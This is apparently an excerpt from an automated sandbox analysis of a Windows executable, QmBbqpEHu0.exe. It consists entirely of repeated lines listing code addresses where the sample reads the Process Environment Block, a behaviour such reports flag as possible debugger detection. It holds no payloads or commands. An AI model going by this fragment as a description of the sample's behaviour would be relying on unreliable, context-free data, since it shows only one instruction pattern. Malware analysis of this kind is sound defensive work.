                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE016 mov eax, dword ptr fs:[00000030h]4_2_00FDE016
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE016 mov eax, dword ptr fs:[00000030h]4_2_00FDE016
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010961E5 mov eax, dword ptr fs:[00000030h]4_2_010961E5
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01044000 mov ecx, dword ptr fs:[00000030h]4_2_01044000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01062000 mov eax, dword ptr fs:[00000030h]4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF01F8 mov eax, dword ptr fs:[00000030h]4_2_00FF01F8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01056030 mov eax, dword ptr fs:[00000030h]4_2_01056030
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046050 mov eax, dword ptr fs:[00000030h]4_2_01046050
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBA197 mov eax, dword ptr fs:[00000030h]4_2_00FBA197
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBA197 mov eax, dword ptr fs:[00000030h]4_2_00FBA197
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBA197 mov eax, dword ptr fs:[00000030h]4_2_00FBA197
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6154 mov eax, dword ptr fs:[00000030h]4_2_00FC6154
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6154 mov eax, dword ptr fs:[00000030h]4_2_00FC6154
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBC156 mov eax, dword ptr fs:[00000030h]4_2_00FBC156
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010580A8 mov eax, dword ptr fs:[00000030h]4_2_010580A8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010860B8 mov eax, dword ptr fs:[00000030h]4_2_010860B8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010860B8 mov ecx, dword ptr fs:[00000030h]4_2_010860B8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010420DE mov eax, dword ptr fs:[00000030h]4_2_010420DE
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF0124 mov eax, dword ptr fs:[00000030h]4_2_00FF0124
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010460E0 mov eax, dword ptr fs:[00000030h]4_2_010460E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010020F0 mov ecx, dword ptr fs:[00000030h]4_2_010020F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD02E1 mov eax, dword ptr fs:[00000030h]4_2_00FD02E1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD02E1 mov eax, dword ptr fs:[00000030h]4_2_00FD02E1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD02E1 mov eax, dword ptr fs:[00000030h]4_2_00FD02E1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01098324 mov eax, dword ptr fs:[00000030h]4_2_01098324
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01098324 mov ecx, dword ptr fs:[00000030h]4_2_01098324
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01098324 mov eax, dword ptr fs:[00000030h]4_2_01098324
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01098324 mov eax, dword ptr fs:[00000030h]4_2_01098324
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA2C3 mov eax, dword ptr fs:[00000030h]4_2_00FCA2C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA2C3 mov eax, dword ptr fs:[00000030h]4_2_00FCA2C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA2C3 mov eax, dword ptr fs:[00000030h]4_2_00FCA2C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA2C3 mov eax, dword ptr fs:[00000030h]4_2_00FCA2C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA2C3 mov eax, dword ptr fs:[00000030h]4_2_00FCA2C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0109634F mov eax, dword ptr fs:[00000030h]4_2_0109634F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01042349 mov eax, dword ptr fs:[00000030h]4_2_01042349
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01068350 mov ecx, dword ptr fs:[00000030h]4_2_01068350
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104035C mov eax, dword ptr fs:[00000030h]4_2_0104035C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104035C mov eax, dword ptr fs:[00000030h]4_2_0104035C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104035C mov eax, dword ptr fs:[00000030h]4_2_0104035C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104035C mov ecx, dword ptr fs:[00000030h]4_2_0104035C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104035C mov eax, dword ptr fs:[00000030h]4_2_0104035C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104035C mov eax, dword ptr fs:[00000030h]4_2_0104035C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108A352 mov eax, dword ptr fs:[00000030h]4_2_0108A352
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD02A0 mov eax, dword ptr fs:[00000030h]4_2_00FD02A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD02A0 mov eax, dword ptr fs:[00000030h]4_2_00FD02A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106437C mov eax, dword ptr fs:[00000030h]4_2_0106437C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE284 mov eax, dword ptr fs:[00000030h]4_2_00FFE284
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE284 mov eax, dword ptr fs:[00000030h]4_2_00FFE284
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB826B mov eax, dword ptr fs:[00000030h]4_2_00FB826B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4260 mov eax, dword ptr fs:[00000030h]4_2_00FC4260
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4260 mov eax, dword ptr fs:[00000030h]4_2_00FC4260
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4260 mov eax, dword ptr fs:[00000030h]4_2_00FC4260
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6259 mov eax, dword ptr fs:[00000030h]4_2_00FC6259
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBA250 mov eax, dword ptr fs:[00000030h]4_2_00FBA250
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB823B mov eax, dword ptr fs:[00000030h]4_2_00FB823B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010463C0 mov eax, dword ptr fs:[00000030h]4_2_010463C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107C3CD mov eax, dword ptr fs:[00000030h]4_2_0107C3CD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010643D4 mov eax, dword ptr fs:[00000030h]4_2_010643D4
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010643D4 mov eax, dword ptr fs:[00000030h]4_2_010643D4
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E3DB mov eax, dword ptr fs:[00000030h]4_2_0106E3DB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E3DB mov eax, dword ptr fs:[00000030h]4_2_0106E3DB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E3DB mov ecx, dword ptr fs:[00000030h]4_2_0106E3DB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E3DB mov eax, dword ptr fs:[00000030h]4_2_0106E3DB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF63FF mov eax, dword ptr fs:[00000030h]4_2_00FF63FF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE3F0 mov eax, dword ptr fs:[00000030h]4_2_00FDE3F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE3F0 mov eax, dword ptr fs:[00000030h]4_2_00FDE3F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE3F0 mov eax, dword ptr fs:[00000030h]4_2_00FDE3F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD03E9 mov eax, dword ptr fs:[00000030h]4_2_00FD03E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC83C0 mov eax, dword ptr fs:[00000030h]4_2_00FC83C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC83C0 mov eax, dword ptr fs:[00000030h]4_2_00FC83C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC83C0 mov eax, dword ptr fs:[00000030h]4_2_00FC83C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC83C0 mov eax, dword ptr fs:[00000030h]4_2_00FC83C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA3C0 mov eax, dword ptr fs:[00000030h]4_2_00FCA3C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA3C0 mov eax, dword ptr fs:[00000030h]4_2_00FCA3C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA3C0 mov eax, dword ptr fs:[00000030h]4_2_00FCA3C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA3C0 mov eax, dword ptr fs:[00000030h]4_2_00FCA3C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA3C0 mov eax, dword ptr fs:[00000030h]4_2_00FCA3C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA3C0 mov eax, dword ptr fs:[00000030h]4_2_00FCA3C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01048243 mov eax, dword ptr fs:[00000030h]4_2_01048243
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01048243 mov ecx, dword ptr fs:[00000030h]4_2_01048243
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0109625D mov eax, dword ptr fs:[00000030h]4_2_0109625D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A250 mov eax, dword ptr fs:[00000030h]4_2_0107A250
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A250 mov eax, dword ptr fs:[00000030h]4_2_0107A250
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8397 mov eax, dword ptr fs:[00000030h]4_2_00FB8397
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8397 mov eax, dword ptr fs:[00000030h]4_2_00FB8397
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8397 mov eax, dword ptr fs:[00000030h]4_2_00FB8397
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE438F mov eax, dword ptr fs:[00000030h]4_2_00FE438F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE438F mov eax, dword ptr fs:[00000030h]4_2_00FE438F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE388 mov eax, dword ptr fs:[00000030h]4_2_00FBE388
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE388 mov eax, dword ptr fs:[00000030h]4_2_00FBE388
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE388 mov eax, dword ptr fs:[00000030h]4_2_00FBE388
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040283 mov eax, dword ptr fs:[00000030h]4_2_01040283
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040283 mov eax, dword ptr fs:[00000030h]4_2_01040283
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040283 mov eax, dword ptr fs:[00000030h]4_2_01040283
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov ecx, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010962D6 mov eax, dword ptr fs:[00000030h]4_2_010962D6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBC310 mov ecx, dword ptr fs:[00000030h]4_2_00FBC310
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE0310 mov ecx, dword ptr fs:[00000030h]4_2_00FE0310
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA30B mov eax, dword ptr fs:[00000030h]4_2_00FFA30B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA30B mov eax, dword ptr fs:[00000030h]4_2_00FFA30B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA30B mov eax, dword ptr fs:[00000030h]4_2_00FFA30B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01056500 mov eax, dword ptr fs:[00000030h]4_2_01056500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC04E5 mov ecx, dword ptr fs:[00000030h]4_2_00FC04E5
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF44B0 mov ecx, dword ptr fs:[00000030h]4_2_00FF44B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC64AB mov eax, dword ptr fs:[00000030h]4_2_00FC64AB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEA470 mov eax, dword ptr fs:[00000030h]4_2_00FEA470
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEA470 mov eax, dword ptr fs:[00000030h]4_2_00FEA470
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEA470 mov eax, dword ptr fs:[00000030h]4_2_00FEA470
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010405A7 mov eax, dword ptr fs:[00000030h]4_2_010405A7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010405A7 mov eax, dword ptr fs:[00000030h]4_2_010405A7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010405A7 mov eax, dword ptr fs:[00000030h]4_2_010405A7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE245A mov eax, dword ptr fs:[00000030h]4_2_00FE245A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB645D mov eax, dword ptr fs:[00000030h]4_2_00FB645D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE420 mov eax, dword ptr fs:[00000030h]4_2_00FBE420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE420 mov eax, dword ptr fs:[00000030h]4_2_00FBE420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE420 mov eax, dword ptr fs:[00000030h]4_2_00FBE420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBC427 mov eax, dword ptr fs:[00000030h]4_2_00FBC427
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8402 mov eax, dword ptr fs:[00000030h]4_2_00FF8402
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8402 mov eax, dword ptr fs:[00000030h]4_2_00FF8402
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8402 mov eax, dword ptr fs:[00000030h]4_2_00FF8402
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC5ED mov eax, dword ptr fs:[00000030h]4_2_00FFC5ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC5ED mov eax, dword ptr fs:[00000030h]4_2_00FFC5ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC25E0 mov eax, dword ptr fs:[00000030h]4_2_00FC25E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC65D0 mov eax, dword ptr fs:[00000030h]4_2_00FC65D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA5D0 mov eax, dword ptr fs:[00000030h]4_2_00FFA5D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA5D0 mov eax, dword ptr fs:[00000030h]4_2_00FFA5D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE5CF mov eax, dword ptr fs:[00000030h]4_2_00FFE5CF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE5CF mov eax, dword ptr fs:[00000030h]4_2_00FFE5CF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE45B1 mov eax, dword ptr fs:[00000030h]4_2_00FE45B1
